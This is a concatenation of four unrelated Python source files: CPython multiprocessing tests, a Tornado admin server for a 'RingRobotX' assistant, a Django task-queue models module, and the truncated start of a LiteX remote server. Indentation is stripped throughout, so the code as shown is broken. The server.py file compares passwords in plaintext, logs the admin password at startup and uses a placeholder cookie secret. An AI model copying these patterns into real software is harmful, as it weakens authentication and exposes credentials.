def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
server.py
|
import time
import func_packages.RingRobotX_Web.server.Websocket
import tornado.ioloop
import tornado.web
import model.config
import threading
import asyncio
import json
import func_packages.RingRobotX_ChatHistory.main
import bcrypt
class BaseHandler(tornado.web.RequestHandler):
def get_current_user(self):
return self.get_secure_cookie("user")
class MainHandler(BaseHandler):
def get(self):
global history
history = None
if not self.current_user:
self.redirect("/login")
return
self.render('index.html')
class StudyHandler(BaseHandler):
def get(self):
if not self.current_user:
self.redirect("/login")
return
self.render('study.html')
class CLIHandler(BaseHandler):
def get(self):
if not self.current_user:
self.redirect("/login")
return
salt = bcrypt.gensalt(rounds=10)
hashed = bcrypt.hashpw(model.config.fastGetConfig("RingRobotX_Web")["password"].encode(), salt)
self.render('cli.html',token=hashed.decode(),port=str("{}").format(model.config.fastGetConfig("RingRobotX_Web")["websocket_port"]))
class DhHandler(BaseHandler):
def get(self):
if not self.current_user:
self.redirect("/login")
return
self.render('dh.html', history=func_packages.RingRobotX_ChatHistory.main.get_history())
class HistoryHandler(BaseHandler):
def get(self):
if not self.current_user:
res = {'code': 1, 'message': 'illegal visit'}
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(func_packages.RingRobotX_ChatHistory.main.get_history())}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
def get(self):
if not self.current_user:
self.redirect("/login")
return
with open("./log/" + time.strftime("%Y%m%d") + '.log', encoding="utf-8") as file_obj:
contents = file_obj.readlines()
self.render('log.html', log=contents)
class ChatHandler(BaseHandler):
def post(self):
if not self.current_user:
res = {'code': 1, 'message': 'illegal visit'}
print('chl1..........')
else:
global jineng_s_r
query = self.get_argument('query', '')
sc_s = str(query)
if sc_s != '':
model.hook.runhook_fast("RRCore.Model.FuncAction",sc_s,"return")
print('chl3..........')
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
def get(self):
if self.current_user:
self.redirect('/')
return
'''
self.write('<html><body><form action="/login" method="post">'
'Name: <input type="text" name="name"><br/>'
'Password: <input type="password" name="password">'
'<input type="submit" value="Sign in">'
'</form></body></html>')
'''
self.render('login.html')
def post(self):
if model.config.fastGetConfig("RingRobotX_Web")["password"] == self.get_argument('password', default=''): # 可自行修改
self.set_secure_cookie("user", self.get_argument("name"))
self.redirect("/")
else:
self.write('用户名或密码错误,请尝试重新输入')
pass
settings = {
"cookie_secret": "__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
"template_path": "./func_packages/RingRobotX_Web/server/template",
"static_path": "./func_packages/RingRobotX_Web/server/static",
}
def make_app():
return tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/study", StudyHandler),
(r"/dh", DhHandler),
(r"/history", HistoryHandler),
(r"/chat", ChatHandler),
(r"/log", GetLogHandler),
(r"/cli",CLIHandler)
], **settings)
app = make_app()
def start_server():
asyncio.set_event_loop(asyncio.new_event_loop())
app.listen(model.config.fastGetConfig("RingRobotX_Web")["listen_port"])
tornado.ioloop.IOLoop.current().start()
def run():
threading.Thread(target=start_server).start()
func_packages.RingRobotX_Web.server.Websocket.run()
model.logger.moduleLoggerMain.info("[Server] 后台启动,地址:localhost:" + str(model.config.fastGetConfig("RingRobotX_Web")["listen_port"])+"\n 密码:"+model.config.fastGetConfig("RingRobotX_Web")["password"])
def hread(readlog_r):
global readlog_s_r
readlog_s_r = readlog_r
|
models.py
|
# coding=utf-8
import json
import logging
import random
import signal
from datetime import datetime, timedelta
from enum import IntEnum
from itertools import chain
from threading import Thread
from time import sleep
import six
from django.conf import settings
from django.db import DatabaseError
from django.db import models
from django.db import transaction
from django.db.utils import IntegrityError
from django.utils import timezone
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as __, ugettext_lazy as _
from django_tasker.exceptions import RetryLaterException
logging = logging.getLogger(__name__)
class ChoicesIntEnum(IntEnum):
"""Extends IntEum with django choices generation capability"""
@classmethod
def choices(cls):
return [(item.value, __(item.name.replace("_", " ").capitalize())) for item in cls]
@classmethod
def values(cls):
return [item.value for item in cls]
class QueueStatus(ChoicesIntEnum):
enabled = 0
disabled = 1
class TaskWorker(object):
def __init__(self, queue):
self.queue = queue
self._stop_requested = False
self.back_off_seconds = None
self.run_count = 0
self.cleanup_rate = self.queue.rate_limit or 5000
def __call__(self):
logging.info("Worker booting for queue: %s", self.queue)
while True:
if self._stop_requested:
logging.info('Stopping on request')
break
self.run_once()
def run_once(self):
queue = self.queue
try:
logging.debug("run_once: %s", self.queue)
if self.run_count % self.cleanup_rate == 0:
queue.retry_busy_timeouts()
emtpy_run = queue.process_batch()
except Exception as ex:
self.back_off_seconds = queue.on_error_back_off(self.back_off_seconds, ex)
else:
self.back_off_seconds = None
if emtpy_run:
seconds = getattr(settings, 'TASKER_SLEEP_TIME', 60)
logging.debug("Queue %s had empty run, it will sleep for %s seconds", queue.name, seconds)
sleep(seconds)
def request_stop(self):
self._stop_requested = True
@classmethod
def run_queues(cls, queue_names):
logging.info("Running workers for queues: %s if they are enabled", queue_names)
qry = TaskQueue.objects.filter(status=QueueStatus.enabled)
if queue_names:
qry = qry.filter(name__in=queue_names)
workers = [cls(q) for q in qry]
threads = [Thread(target=w) for w in workers]
for t in threads:
t.start()
cls.setup_signals(workers)
@classmethod
def setup_signals(cls, workers):
def request_workers_stop(signum, frame):
logging.info("Warm shut down requested: %s", signum)
for w in workers:
w.request_stop()
# TODO: handle signals correctly
signal.signal(signal.SIGINT, request_workers_stop)
signal.signal(signal.SIGTERM, request_workers_stop)
signals_to_names = {}
for n in dir(signal):
if n.startswith('SIG') and not n.startswith('SIG_'):
signals_to_names[getattr(signal, n)] = n
for s, name in sorted(signals_to_names.items()):
handler = signal.getsignal(s)
if handler is signal.SIG_DFL:
handler = 'SIG_DFL'
elif handler is signal.SIG_IGN:
handler = 'SIG_IGN'
print('%-10s (%2d):' % (name, s), handler)
class TaskQueue(models.Model):
name = models.CharField(max_length=100, default='default', unique=True)
rate_limit = models.PositiveSmallIntegerField(null=True, blank=True, help_text='Maximum number of tasks to run per hour')
status = models.PositiveSmallIntegerField(default=QueueStatus.enabled, choices=QueueStatus.choices())
back_off_base_seconds = models.PositiveSmallIntegerField(default=60)
back_off_max_seconds = models.PositiveIntegerField(default=86400)
back_off_multiplier = models.FloatField(default=4)
busy_max_seconds = models.PositiveIntegerField(default=3600)
def __init__(self, *args, **kwargs):
super(TaskQueue, self).__init__(*args, **kwargs)
if self.rate_limit:
self.time_interval = timedelta(seconds=3600 / self.rate_limit)
def __str__(self):
return "TaskQueue:{}:{}.{}".format(self.pk, self.name, self.get_status_display())
def process_batch(self, limit=100):
batch = list(self.get_batch(limit))
random.shuffle(batch)
empty_run = True
for pk in batch:
empty_run = False
start = datetime.now()
if TaskInfo.process_one(pk):
self.throttle(datetime.now() - start)
return empty_run
def get_batch(self, limit, flat=True):
return chain(*[self._get_one_batch(limit, target_id, flat) for target_id in self.targets])
def _get_one_batch(self, limit, target_id, flat=True):
logging.debug("limit: %s on target_id = %s", limit, target_id)
qry = TaskInfo.objects.filter(eta__lte=timezone.now(), status__in=(TaskStatus.queued, TaskStatus.retry), target_id=target_id)
# qry = qry.order_by('eta') # Ordering seems to introduce performance issues
if flat:
qry = qry.values_list('id', flat=True)
return qry[:limit]
@property
def targets(self):
if not hasattr(self, '_targets'):
self._targets = list(TaskTarget.objects.filter(queue=self).values_list('id', flat=True))
return self._targets
def throttle(self, duration):
if self.rate_limit:
wait = self.time_interval - duration
if wait > timedelta():
logging.debug("Throttle limiting for seconds: %s", wait.total_seconds())
sleep(wait.seconds)
def on_error_back_off(self, seconds, ex):
if seconds is None:
seconds = self.back_off_base_seconds
else:
seconds *= self.back_off_multiplier
logging.error("Work failed on %s, backing off for %s seconds", self.name, seconds, exc_info=ex)
sleep(min(seconds, self.back_off_max_seconds))
return seconds
def retry_busy_timeouts(self):
logging.debug("retry_busy_timeouts: %s", self)
when = timezone.now() - timedelta(seconds=self.busy_max_seconds)
rows = TaskInfo.objects.filter(ts__lte=when, status=TaskStatus.busy, target_id__in=self.targets).update(status=TaskStatus.retry)
if rows:
logging.info("Retrying busy %s timeouts in %s queue", rows, self)
return rows
@six.python_2_unicode_compatible
class TaskTarget(models.Model):
name = models.CharField(max_length=100, unique=True)
queue = models.ForeignKey(TaskQueue, on_delete=models.CASCADE)
max_retries = models.PositiveSmallIntegerField(default=5)
def __str__(self):
return self.name
class TaskStatus(ChoicesIntEnum):
created = 0
queued = 1
eager = 2
retry = 3
busy = 4
success = 5
error = 6
corrupted = 7
@six.python_2_unicode_compatible
class TaskInfo(models.Model):
created = models.DateTimeField(auto_now_add=True)
executed = models.DateTimeField(blank=True, null=True)
ts = models.DateTimeField(auto_now=True, db_index=True)
retry_count = models.PositiveSmallIntegerField(default=0, db_index=True)
eta = models.DateTimeField(null=True, blank=True, db_index=True)
target = models.ForeignKey(TaskTarget, db_index=True, on_delete=models.CASCADE)
payload = models.CharField(max_length=300, null=True, blank=True)
status = models.IntegerField(default=TaskStatus.created, choices=TaskStatus.choices(), db_index=True)
status_message = models.TextField(default=None, blank=None, null=True)
name = models.CharField(max_length=300, null=True, blank=True, unique=True)
class Meta:
index_together = (
('status', 'eta'), # Used by TaskQueue.get_batch
('status', 'eta', 'target'), # Used by TaskQueue.get_batch
('status', 'ts'), # Used by TaskQueue.retry_busy_timeouts
('status', 'eta', 'target', 'id'),
# ('id', 'eta', 'status'),
# ('id', 'target'),
# ('id', 'target', 'status', 'eta'),
('target', 'eta'), # TaskInfo.is_unique?
('target', 'status'),
)
def __str__(self):
return "TaskInfo:{}:{}:{}:{}:{}".format(self.pk, self.get_status_display(), self.target, self.retry_count, self.eta)
@classmethod
def setup(cls, target, instance, queue='default', rate_limit=None, countdown=0, eta=None, max_retries=5, name=None):
logging.debug("method.__name__: %s", target.__name__)
now = timezone.now()
eta = eta or (now + timedelta(seconds=countdown))
target_name = cls.get_target_name(target, instance)
target = TaskTarget.objects.filter(name=target_name).first()
if target is None:
queue, created = TaskQueue.objects.get_or_create(name=queue, defaults={'rate_limit': rate_limit})
target, created = TaskTarget.objects.get_or_create(name=target_name, defaults={'queue': queue, 'max_retries': max_retries})
eager = getattr(settings, 'TASKER_ALWAYS_EAGER', None)
task = cls(target=target, eta=eta, status=TaskStatus.eager if eager else TaskStatus.queued, name=name)
task.instance = instance
return task
@staticmethod
def get_target_name(target, instance):
instance = instance or getattr(target, '__self__', None)
# class methods will have __self__ set with class
if instance and not isinstance(instance, type):
target_name = '.'.join((instance.__module__, instance.__class__.__name__, target.__name__))
else:
target_name = '.'.join((target.__module__, target.__qualname__))
return target_name
def queue_once(self, *args, **kwargs):
"""Queue this task only if another similar task does not exits already"""
payload = self._get_payload(args, kwargs)
if self.is_unique(payload):
return self._queue_payload(payload)
def is_unique(self, payload):
assert self.pk is None, "Checking for uniques is not supported for saved tasks"
return not TaskInfo.objects.filter(
eta=self.eta,
target=self.target,
payload=payload,
).exists()
def queue(self, *args, **kwargs):
payload = self._get_payload(args, kwargs)
return self._queue_payload(payload)
def _queue_payload(self, payload):
self.payload = payload
try:
self.save()
except IntegrityError as ex:
if ex.args and ex.args[0] == 'UNIQUE constraint failed: django_tasker_taskinfo.name':
logging.info("Duplicate task name not saved: %s", self)
return self
pass
if self.status == TaskStatus.eager:
self.execute()
return self
def _get_payload(self, args, kwargs):
payload = {}
if args:
payload['args'] = args
if kwargs:
payload['kwargs'] = kwargs
if isinstance(self.instance, models.Model):
assert hasattr(self.instance, 'pk'), "Model instance must have a 'pk' attribute, so task can store it for retrieval before execution"
pk = getattr(self.instance, 'pk')
assert pk is not None, "Model instance must be saved and have a 'pk' value, before it's method can be queued. Alternatively you can use queue a classmethod without pk set"
payload['pk'] = pk
return json.dumps(payload) if payload else None
def execute(self):
logging.info("Executing task : %s", self)
try:
target, args, kwargs = self.prepare_call()
self._execute_call(target, args, kwargs)
except Exception as ex:
logging.warning("{} execution failed".format(str(self)), exc_info=ex)
self.error(self.get_error_status_message(ex), status=TaskStatus.corrupted)
logging.info("Executing complete : %s", self)
def _execute_call(self, target, args, kwargs):
try:
with transaction.atomic():
target(*args, **kwargs)
except RetryLaterException as ex:
self.retry(ex)
except Exception as ex:
self.error(ex)
else:
self.success()
def prepare_call(self):
payload = json.loads(self.payload) if self.payload else {}
args = payload.get('args', [])
kwargs = payload.get('kwargs', {})
pk = payload.get('pk', None)
where, target = self.target.name.rsplit('.', 1)
where = import_string(where)
if pk:
where = where.objects.get(pk=pk)
target = getattr(where, target)
return target, args, kwargs
@classmethod
def process_one(cls, pk):
logging.debug("process_one: %s", pk)
rows = cls.objects.filter(pk=pk, status__in=(TaskStatus.queued, TaskStatus.retry)).update(status=TaskStatus.busy)
if rows < 1:
return
task = cls.objects.get(pk=pk)
task.execute()
return task
def success(self):
self.status = TaskStatus.success
self.executed = timezone.now()
self.save()
def retry(self, ex, status=TaskStatus.retry):
# This is a task controlled retry, it does not count toward max_retries
# if tasks wants to retry indefinitely we will not object
if getattr(settings, 'TASKER_ALWAYS_EAGER', None):
logging.error("Failing permanently on task in eager mode", exc_info=ex)
# there is no point in retrying this in eager mode, it fail each time
return
logging.warning("Retrying on task request", exc_info=ex)
self.eta = ex.eta
self.status_message = self.get_error_status_message(ex)
self.status = status
self.save()
def error(self, ex, status=TaskStatus.error):
logging.error("{} execution failed".format(str(self)), exc_info=True)
self.status = status
self.status_message = self.get_error_status_message(ex)
self.retry_count += 1
if self.retry_count <= self.target.max_retries:
self.status = TaskStatus.retry
countdown = get_retry_countdown(self.retry_count)
self.eta = timezone.now() + timedelta(seconds=countdown)
else:
logging.error("Exceed max_retries on task %s", self, exc_info=ex)
self.save()
# noinspection PyMethodMayBeStatic
def get_error_status_message(self, ex):
return str(ex)
def get_retry_countdown(retries):
return {
0: 30,
1: 60,
2: 300,
3: 1200,
}.get(retries, 3600)
|
litex_server.py
|
#!/usr/bin/env python3
#
# This file is part of LiteX.
#
# Copyright (c) 2015-2021 Florent Kermarrec <florent@enjoy-digital.fr>
# Copyright (c) 2019 Sean Cross <sean@xobs.io>
# Copyright (c) 2018 Felix Held <felix-github@felixheld.de>
# SPDX-License-Identifier: BSD-2-Clause
import argparse
import os
import sys
import socket
import time
import threading
from litex.tools.remote.etherbone import EtherbonePacket, EtherboneRecord, EtherboneWrites
from litex.tools.remote.etherbone import EtherboneIPC
# Read Merger --------------------------------------------------------------------------------------
def _read_merger(addrs, max_length=256, bursts=["incr", "fixed"]):
"""Sequential reads merger
Take a list of read addresses as input and merge the sequential/fixed reads in (base, length, burst) tuples:
Example: [0x0, 0x4, 0x10, 0x14, 0x20, 0x20] input will return [(0x0,2, "incr"), (0x10,2, "incr"), (0x20,2, "fixed")].
This is useful for UARTBone/Etherbone where command/response roundtrip delay is responsible for
most of the access delay and allows minimizing number of commands by grouping them in UARTBone
packets.
"""
assert "incr" in bursts
burst_base = addrs[0]
burst_length = 1
burst_type = "incr"
for addr in addrs[1:]:
merged = False
# Try to merge to a "fixed" burst if supported
if ("fixed" in bursts):
# If current burst matches
if (burst_type in [None, "fixed"]) or (burst_length == 1):
# If addr matches
if (addr == burst_base):
if (burst_length != max_length):
burst_type = "fixed"
burst_length += 1
merged = True
# Try to merge to an "incr" burst if supported
if ("incr" in bursts):
# If current burst matches
if (burst_type in [None, "incr"]) or (burst_length == 1):
# If addr matches
if (addr == burst_base + (4 * burst_length)):
if (burst_length != max_length):
burst_type = "incr"
burst_length += 1
merged = True
# Generate current burst if addr has not able to merge
if not merged:
yield (burst_base, burst_length, burst_type)
burst_base = addr
burst_length = 1
burst_type = "incr"
yield (burst_base, burst_length, burst_type)
# Remote Server ------------------------------------------------------------------------------------
class RemoteServer(EtherboneIPC):
def __init__(self, comm, bind_ip, bind_port=1234):
self.comm = comm
self.bind_ip = bind_ip
self.bind_port = bind_port
self.lock = False
def open(self):
if hasattr(self, "socket"):
return
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SO_REUSEADDR"):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(socket, "SO_REUSEPORT"):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
self.socket.bind((self.bind_ip, self.bind_port))
print("tcp port: {:d}".format(self.bind_port))
self.socket.listen(1)
self.comm.open()
def close(self):
self.comm.close()
if not hasattr(self, "socket"):
return
self.socket.close()
del self.socket
def _serve_thread(self):
while True:
client_socket, addr = self.socket.accept()
